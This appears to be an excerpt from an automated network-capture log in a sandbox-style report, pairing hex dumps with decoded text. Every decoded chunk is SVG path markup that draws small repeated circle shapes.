                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6132INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                        Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6148INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6164INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6180INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6196INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                        Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6212INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                                                                                                        Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6228INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                                                                                                        Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6244INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6260INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6276INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6292INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6308INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6324INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                                                                                                        Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6340INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6356INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6372INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                        Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6388INData Raw: 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 35 2e 31 31 2c 32 34 39 2e 37 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.18,3.32"/><path class="cls-9" d="M325.11,249.73a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8
